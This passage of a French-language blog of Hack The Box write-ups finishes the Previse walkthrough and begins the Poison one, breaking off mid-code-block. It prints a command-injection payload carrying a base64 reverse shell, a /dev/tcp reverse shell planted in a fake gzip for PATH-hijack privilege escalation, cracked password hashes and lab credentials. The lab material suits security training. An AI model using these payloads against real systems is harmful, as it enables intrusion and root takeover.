class="o">=</span>password </span></span></code></pre></td></tr></table> </div> </div><h3 id="filesphp---sitebackupzip">files.php - siteBackup.zip </h3><p>On trouve un zip avec tout le code du site web. On a notammment les creds mysql.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">&lt;?php </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">function</span> connectDB<span class="o">(){</span> </span></span><span class="line"><span class="cl"> <span class="nv">$host</span> <span class="o">=</span> <span class="s1">&#39;localhost&#39;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="nv">$user</span> <span class="o">=</span> <span class="s1">&#39;root&#39;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="nv">$passwd</span> <span class="o">=</span> <span class="s1">&#39;mySQL_p@ssw0rd!:)&#39;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="nv">$db</span> <span class="o">=</span> <span class="s1">&#39;previse&#39;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="nv">$mycon</span> <span class="o">=</span> new mysqli<span class="o">(</span><span class="nv">$host</span>, <span class="nv">$user</span>, <span class="nv">$passwd</span>, <span class="nv">$db</span><span class="o">)</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="nv">$mycon</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="o">}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">?&gt; </span></span></code></pre></td></tr></table> </div> </div><h3 id="logsphp-code-injection">logs.php code injection </h3><p>Dans le fichier logs.php on découvre l&rsquo;utilsation d&rsquo;une variable $_POST[&lsquo;delim&rsquo;] dans la fonction. On peut executer un shell facilement. On met en base64 le shell pour facilité l&rsquo;execution de la commande:</p> <p>POST /logs.php &hellip; delim=space;ech&rsquo;/&lsquo;o+c2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTkvMTMzNyAwPiYx+|+base64+-d+|+bash</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">&lt;?php </span></span><span class="line"><span class="cl"><span class="k">if</span> <span class="o">(</span>!<span class="nv">$_SERVER</span><span class="o">[</span><span class="s1">&#39;REQUEST_METHOD&#39;</span><span class="o">]</span> <span class="o">==</span> <span class="s1">&#39;POST&#39;</span><span class="o">)</span> <span class="o">{</span> </span></span><span class="line"><span class="cl"> header<span class="o">(</span><span class="s1">&#39;Location: login.php&#39;</span><span class="o">)</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> exit<span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="o">}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">///////////////////////////////////////////////////////////////////////////////////// </span></span><span class="line"><span class="cl">//I tried really hard to parse the log delims in PHP, but python was SO MUCH EASIER// </span></span><span class="line"><span class="cl">///////////////////////////////////////////////////////////////////////////////////// </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nv">$output</span> <span class="o">=</span> exec<span class="o">(</span><span class="s2">&#34;/usr/bin/python /opt/scripts/log_process.py {</span><span class="nv">$_POST</span><span class="s2">[&#39;delim&#39;]}&#34;</span><span class="o">)</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nb">echo</span> <span class="nv">$output</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nv">$filepath</span> <span class="o">=</span> <span class="s2">&#34;/var/www/out.log&#34;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nv">$filename</span> <span class="o">=</span> <span class="s2">&#34;out.log&#34;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">if</span><span class="o">(</span>file_exists<span class="o">(</span><span class="nv">$filepath</span><span class="o">))</span> <span class="o">{</span> </span></span><span class="line"><span class="cl"> header<span class="o">(</span><span class="s1">&#39;Content-Description: File Transfer&#39;</span><span class="o">)</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> header<span class="o">(</span><span class="s1">&#39;Content-Type: application/octet-stream&#39;</span><span class="o">)</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">----------------------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Previse/siteBackup<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ nc -lnvp <span class="m">1337</span> </span></span><span class="line"><span class="cl">listening on <span class="o">[</span>any<span class="o">]</span> <span class="m">1337</span> ... </span></span><span class="line"><span class="cl">connect to <span class="o">[</span>10.10.14.19<span class="o">]</span> from <span class="o">(</span>UNKNOWN<span class="o">)</span> <span class="o">[</span>10.10.11.104<span class="o">]</span> <span class="m">60650</span> </span></span><span class="line"><span class="cl">sh: 0: can<span class="s1">&#39;t access tty; job control turned off </span></span></span><span class="line"><span class="cl"><span class="s1">$ whoami </span></span></span><span class="line"><span class="cl"><span class="s1">www-data </span></span></span><span class="line"><span class="cl"><span class="s1">$ python3 -c &#34;import pty;pty.spawn(&#39;</span>/bin/bash<span class="err">&#39;</span><span class="o">)</span><span class="s2">&#34; </span></span></span><span class="line"><span class="cl"><span class="s2">www-data@previse:/var/www/html</span>$<span class="s2"> </span></span></span><span class="line"><span class="cl"><span class="s2"> </span></span></span><span class="line"><span class="cl"><span class="s2">www-data@previse:/var/www/html</span>$<span class="s2"> </span></span></span><span class="line"><span class="cl"><span class="s2"> </span></span></span><span class="line"><span class="cl"><span class="s2">www-data@previse:/var/www/html</span>$<span class="s2"> export TERM=xterm </span></span></span><span class="line"><span class="cl"><span class="s2">export TERM=xterm </span></span></span><span class="line"><span class="cl"><span class="s2">www-data@previse:/var/www/html</span>$<span class="s2"> ^Z </span></span></span><span class="line"><span class="cl"><span class="s2">zsh: suspended nc -lnvp 1337 </span></span></span></code></pre></td></tr></table> </div> </div><h3 id="m4lwhere---mysql-db">m4lwhere - mysql db </h3><p>On se connecte avec mysql et les creds recupérés dans config.php</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">mysql&gt; <span class="k">select</span> * from accounts<span class="p">;</span> </span></span><span class="line"><span class="cl">+----+----------+------------------------------------+---------------------+ </span></span><span class="line"><span class="cl"><span class="p">|</span> id <span class="p">|</span> username <span class="p">|</span> password <span class="p">|</span> created_at <span class="p">|</span> </span></span><span class="line"><span class="cl">+----+----------+------------------------------------+---------------------+ </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">1</span> <span class="p">|</span> m4lwhere <span class="p">|</span> <span class="nv">$1</span>$🧂llol<span class="nv">$DQpmdvnb7EeuO6UaqRItf</span>. <span class="p">|</span> 2021-05-27 18:18:36 <span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">2</span> <span class="p">|</span> leopold <span class="p">|</span> <span class="nv">$1</span>$🧂llol<span class="nv">$79</span>cV9c1FNnnr7LcfPFlqQ0 <span class="p">|</span> 2025-03-05 17:01:15 <span class="p">|</span> </span></span><span class="line"><span class="cl">+----+----------+------------------------------------+---------------------+ </span></span></code></pre></td></tr></table> </div> </div><p>On casse le hash avec hashcat (md5crypt &ndash;&gt; -m 500) :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ hashcat -m <span class="m">500</span> ./hash.txt ~/wordlists/rockyou.txt --show </span></span><span class="line"><span class="cl"><span class="nv">$1</span>$🧂llol<span class="nv">$DQpmdvnb7EeuO6UaqRItf</span>.:ilovecody112235! </span></span></code></pre></td></tr></table> </div> </div><p>Connection en ssh :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Previse/siteBackup<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ ssh m4lwhere@10.10.11.104 </span></span><span class="line"><span class="cl">m4lwhere@10.10.11.104<span class="err">&#39;</span>s password: </span></span><span class="line"><span class="cl">Welcome to Ubuntu 18.04.5 LTS <span class="o">(</span>GNU/Linux 4.15.0-151-generic x86_64<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Last login: Fri Jun <span class="m">18</span> 01:09:10 <span class="m">2021</span> from 10.10.10.5 </span></span><span class="line"><span class="cl">m4lwhere@previse:~$ ls </span></span><span class="line"><span class="cl">user.txt </span></span><span class="line"><span class="cl">m4lwhere@previse:~$ cat user.txt </span></span><span class="line"><span class="cl">ccde.....f7fd </span></span></code></pre></td></tr></table> </div> </div><h2 id="privilege-escalation">Privilege Escalation </h2><h3 id="access_backupsh-as-root">access_backup.sh as root </h3><p>sudo -l &ndash;&gt; on observe le fichier <strong>/opt/scripts/access_backup.sh</strong> que l&rsquo;on peut executer en tant que root On voit qu&rsquo;il fait appel à la commande &ldquo;gzip&rdquo;.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">m4lwhere@previse:~/bin$ sudo -l </span></span><span class="line"><span class="cl">User m4lwhere may run the following commands on previse: </span></span><span class="line"><span class="cl"> <span class="o">(</span>root<span class="o">)</span> /opt/scripts/access_backup.sh </span></span><span class="line"><span class="cl">m4lwhere@previse:~/bin$ cat /opt/scripts/access_backup.sh </span></span><span class="line"><span class="cl"><span class="c1">#!/bin/bash</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1"># We always make sure to store logs, we take security SERIOUSLY here</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1"># I know I shouldnt run this as root but I cant figure it out programmatically on my account</span> </span></span><span class="line"><span class="cl"><span class="c1"># This is configured to run with cron, added to sudo so I can run as needed - we&#39;ll fix it later when there&#39;s time</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">gzip -c /var/log/apache2/access.log &gt; /var/backups/<span class="k">$(</span>date --date<span class="o">=</span><span class="s2">&#34;yesterday&#34;</span> +%Y%b%d<span class="k">)</span>_access.gz </span></span><span class="line"><span class="cl">gzip -c /var/www/file_access.log &gt; /var/backups/<span class="k">$(</span>date --date<span class="o">=</span><span class="s2">&#34;yesterday&#34;</span> +%Y%b%d<span class="k">)</span>_file_access.gz </span></span></code></pre></td></tr></table> </div> </div><p>On peut facilement executer n&rsquo;importe quelle commande en tant que root en modifiant le PATH. On crée un dossier bin dans le /home. On y met un fichier avec le nom &ldquo;gzip&rdquo; et la commande pour ouvrir un reverse shell dedans. Enfin, on ajoute le dossier &ldquo;bin&rdquo; actuel en 1ere place dans le PATH. Lorsque l&rsquo;on va executer en tant que root le script access_backup.sh, il va chercher où se trouve le binaire gzip pour l&rsquo;executer. Le 1er dossier qu&rsquo;il va fouiller est le notre que l&rsquo;on vient d&rsquo;ajouter contenant le faux gzip. Il va donc l&rsquo;executer, au lieu du véritable gzip et ouvrir notre reverse shell en tant que root.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">m4lwhere@previse:~/bin$ <span class="nb">pwd</span> </span></span><span class="line"><span class="cl">/home/m4lwhere/bin </span></span><span class="line"><span class="cl">m4lwhere@previse:~/bin$ <span class="nb">export</span> <span class="nv">PATH</span><span class="o">=</span>/home/m4lwhere/bin:<span class="nv">$PATH</span> </span></span><span class="line"><span class="cl">m4lwhere@previse:~/bin$ vim gzip </span></span><span class="line"><span class="cl">m4lwhere@previse:~/bin$ chmod +x gzip </span></span><span class="line"><span class="cl">m4lwhere@previse:~/bin$ cat gzip </span></span><span class="line"><span class="cl"><span class="c1">#!/bin/bash</span> </span></span><span class="line"><span class="cl">sh -i &gt;<span class="p">&amp;</span> /dev/tcp/10.10.14.19/6666 0&gt;<span class="p">&amp;</span><span class="m">1</span> </span></span><span class="line"><span class="cl">m4lwhere@previse:~/bin$ sudo /opt/scripts/access_backup.sh </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">----------------------------------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Previse/siteBackup<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ nc -lnvp <span class="m">6666</span> </span></span><span class="line"><span class="cl">listening on <span class="o">[</span>any<span class="o">]</span> <span class="m">6666</span> ... </span></span><span class="line"><span class="cl">connect to <span class="o">[</span>10.10.14.19<span class="o">]</span> from <span class="o">(</span>UNKNOWN<span class="o">)</span> <span class="o">[</span>10.10.11.104<span class="o">]</span> <span class="m">50272</span> </span></span><span class="line"><span class="cl"><span class="c1"># whoami</span> </span></span><span class="line"><span class="cl">root </span></span><span class="line"><span class="cl"><span class="c1"># cat /root/root.txt</span> </span></span><span class="line"><span class="cl">3ed1.....e90e </span></span></code></pre></td></tr></table> </div> </div>https://leopoldabgn.github.io/writeups/p/poison-htb/Tue, 04 Mar 2025 00:00:00 +0000https://leopoldabgn.github.io/writeups/p/poison-htb/<table style="border:none; width:100%;"> <tr> <!-- Colonne gauche : logo --> <td style="border:none; text-align:center; vertical-align:middle; width:150px;"> <img src="cover.png" alt="Poison cover" width="120"> </td> <td style="border:none; text-align:center; vertical-align:middle;"> <table style="margin:auto; border-collapse:collapse; border:1px solid #ddd;"> <thead> <tr> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Machine name</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">OS</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">IP</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Difficulty</th> </tr> </thead> <tbody> <tr> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Poison</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Linux</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">10.10.10.84</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Medium</td> </tr> </tbody> </table> </td> </tr> </table> <h2 id="users">Users </h2><p>charix : <code>Charix!2#4%6&amp;8(0</code></p> <h2 id="enumeration">Enumeration </h2><h3 id="nmap">nmap </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="m">22</span> - ssh </span></span><span class="line"><span class="cl"><span class="m">80</span> - http freebsd apache </span></span></code></pre></td></tr></table> </div> </div><h2 id="foothold">Foothold </h2><h3 id="charix---user-flag">charix - user flag </h3><p>Sur la page d&rsquo;accueil on trouve un barre de recherche avec un vuln qui nous permet d&rsquo;afficher n&rsquo;importe quel fichier. On affiche /etc/passwd et on trouve le user <code>charix</code>. Ensuite, on trouve ce fichier sur la page web du port 80 de la machine. Il indique que c&rsquo;est du base64 encodé 13 fois :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">This password is secure, it<span class="err">&#39;</span>s encoded atleast <span class="m">13</span> times.. what could go wrong really.. Vm0wd2QyUXlVWGxWV0d4WFlURndVRlpzWkZOalJsWjBUVlpPV0ZKc2JETlhhMk0xVmpKS1IySkVU bGhoTVVwVVZtcEdZV015U2tWVQpiR2hvVFZWd1ZWWnRjRWRUTWxKSVZtdGtXQXBpUm5CUFdWZDBS bVZHV25SalJYUlVUVlUxU1ZadGRGZFZaM0JwVmxad1dWWnRNVFJqCk1EQjRXa1prWVZKR1NsVlVW M040VGtaa2NtRkdaR2hWV0VKVVdXeGFTMVZHWkZoTlZGSlRDazFFUWpSV01qVlRZVEZLYzJOSVRs WmkKV0doNlZHeGFZVk5IVWtsVWJXaFdWMFZLVlZkWGVHRlRNbEY0VjI1U2ExSXdXbUZEYkZwelYy eG9XR0V4Y0hKWFZscExVakZPZEZKcwpaR2dLWVRCWk1GWkhkR0ZaVms1R1RsWmtZVkl5YUZkV01G WkxWbFprV0dWSFJsUk5WbkJZVmpKMGExWnRSWHBWYmtKRVlYcEdlVmxyClVsTldNREZ4Vm10NFYw MXVUak5hVm1SSFVqRldjd3BqUjJ0TFZXMDFRMkl4WkhOYVJGSlhUV3hLUjFSc1dtdFpWa2w1WVVa T1YwMUcKV2t4V2JGcHJWMGRXU0dSSGJFNWlSWEEyVmpKMFlXRXhXblJTV0hCV1ltczFSVmxzVm5k WFJsbDVDbVJIT1ZkTlJFWjRWbTEwTkZkRwpXbk5qUlhoV1lXdGFVRmw2UmxkamQzQlhZa2RPVEZk WGRHOVJiVlp6VjI1U2FsSlhVbGRVVmxwelRrWlplVTVWT1ZwV2EydzFXVlZhCmExWXdNVWNLVjJ0 NFYySkdjR2hhUlZWNFZsWkdkR1JGTldoTmJtTjNWbXBLTUdJeFVYaGlSbVJWWVRKb1YxbHJWVEZT Vm14elZteHcKVG1KR2NEQkRiVlpJVDFaa2FWWllRa3BYVmxadlpERlpkd3BOV0VaVFlrZG9hRlZz WkZOWFJsWnhVbXM1YW1RelFtaFZiVEZQVkVaawpXR1ZHV210TmJFWTBWakowVjFVeVNraFZiRnBW VmpOU00xcFhlRmRYUjFaSFdrWldhVkpZUW1GV2EyUXdDazVHU2tkalJGbExWRlZTCmMxSkdjRFpO <span class="nv">Ukd4RVdub3dPVU5uUFQwSwo</span><span class="o">=</span> </span></span></code></pre></td></tr></table> </div> </div><p>On trouve ce script bash sur un forum qui permet de rapidement effectué 13 fois un base64 -d :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="nv">state</span><span class="o">=</span><span class="k">$(</span>&lt;b64.txt<span class="k">)</span> </span></span><span class="line"><span class="cl"><span class="k">for</span> i in <span class="o">{</span>1..13<span class="o">}</span><span class="p">;</span> <span class="k">do</span> </span></span><span class="line"><span class="cl"> <span class="nv">state</span><span class="o">=</span><span class="k">$(</span><span class="o">&lt;&lt;&lt;</span><span class="s2">&#34;</span><span class="nv">$state</span><span class="s2">&#34;</span> base64 --decode<span class="k">)</span> </span></span><span class="line"><span class="cl"><span class="k">done</span> </span></span><span class="line"><span class="cl"><span class="nb">echo</span> <span class="s2">&#34;</span><span class="nv">$state</span><span class="s2">&#34;</span> </span></span></code></pre></td></tr></table> </div> </div><p>On trouve rapidement le mot de passe, puis on se connecte en SSH :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ <span class="nb">cd</span> Poison </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Poison<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ vim b64.txt </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Poison<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ <span class="nv">state</span><span class="o">=</span><span class="k">$(</span>&lt;b64.txt<span class="k">)</span> </span></span><span class="line"><span class="cl"><span class="k">for</span> i in <span class="o">{</span>1..13<span class="o">}</span><span class="p">;</span> <span class="k">do</span> </span></span><span class="line"><span class="cl"> <span class="nv">state</span><span class="o">=</span><span class="k">$(</span><span class="o">&lt;&lt;&lt;</span><span class="s2">&#34;</span><span class="nv">$state</span><span class="s2">&#34;</span> base64 --decode<span class="k">)</span> </span></span><span class="line"><span class="cl"><span class="k">done</span> </span></span><span class="line"><span class="cl"><span class="nb">echo</span> <span class="s2">&#34;</span><span class="nv">$state</span><span class="s2">&#34;</span> </span></span><span class="line"><span class="cl">Charix!2#4%6<span class="p">&amp;</span>8<span class="o">(</span><span class="m">0</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Poison<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ ssh charix@10.10.10.84 </span></span><span class="line"><span class="cl"><span class="o">(</span>charix@10.10.10.84<span class="o">)</span> Password <span class="k">for</span> charix@Poison: </span></span><span class="line"><span class="cl">Last login: Mon Mar <span class="m">19</span> 16:38:00 <span class="m">2018</span> from 10.10.14.4 </span></span><span class="line"><span class="cl">FreeBSD 11.1-RELEASE <span class="o">(</span>GENERIC<span class="o">)</span> <span class="c1">#0 r321309: Fri Jul 21 02:08:28 UTC 2017</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Welcome to FreeBSD! </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Release Notes, Errata: https://www.FreeBSD.org/releases/ </span></span><span class="line"><span class="cl">Security Advisories: https://www.FreeBSD.org/security/ </span></span><span class="line"><span class="cl">FreeBSD Handbook: https://www.FreeBSD.org/handbook/ </span></span><span class="line"><span class="cl">FreeBSD FAQ: https://www.FreeBSD.org/faq/ </span></span><span class="line"><span class="cl">Questions List: https://lists.FreeBSD.org/mailman/listinfo/freebsd-questions/ </span></span><span class="line"><span class="cl">FreeBSD Forums: https://forums.FreeBSD.org/ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Documents installed with the system are in the /usr/local/share/doc/freebsd/ </span></span><span class="line"><span class="cl">directory, or can be installed later with: pkg install en-freebsd-doc </span></span><span class="line"><span class="cl">For other languages, replace <span class="s2">&#34;en&#34;</span> with a language code like de or fr. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Show the version of FreeBSD installed: freebsd-version <span class="p">;</span> uname -a </span></span><span class="line"><span class="cl">Please include that output and any error messages when posting questions. </span></span><span class="line"><span class="cl">Introduction to manual pages: man man </span></span><span class="line"><span class="cl">FreeBSD directory layout: man hier </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Edit /etc/motd to change this login announcement. </span></span><span class="line"><span class="cl">Man pages are divided into section depending on topic. There are <span class="m">9</span> different </span></span><span class="line"><span class="cl">sections numbered from <span class="m">1</span> <span class="o">(</span>General Commands<span class="o">)</span> to <span class="m">9</span> <span class="o">(</span>Kernel Developer<span class="err">&#39;</span>s Manual<span class="o">)</span>. </span></span><span class="line"><span class="cl">You can get an introduction to each topic by typing </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> man &lt;number&gt; intro </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">In other words, to get the intro to general commands, <span class="nb">type</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> man <span class="m">1</span> intro </span></span><span class="line"><span class="cl">charix@Poison:~ % cat user.txt </span></span><span class="line"><span class="cl">eaac.....209c </span></span></code></pre></td></tr></table> </div> </div><p>On a donc : charix : <code>Charix!2#4%6&amp;8(0</code></p> <h2 id="privilege-escalation">Privilege Escalation </h2><h3 id="secretzip">secret.zip </h3><p>On découvre un fichier secret.zip chiffré à la racine du home de charlix. On peut le déchiffrer avec le meme mdp que popur le ssh de charlix: <code>Charix!2#4%6&amp;8(0</code></p> <p>On découvre un fichier de 8 caracteres chiffrés</p> <h3 id="vnc-launched-by-root">VNC launched by root </h3><p>En regardant les process executés par root, on découvre une sessions VNC ouverte sur le port 5901, lancé par root. Si on arrive a s&rsquo;y connecté, on peut optentiellemnt avec un shell en tant que root.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span></code></pre></td> 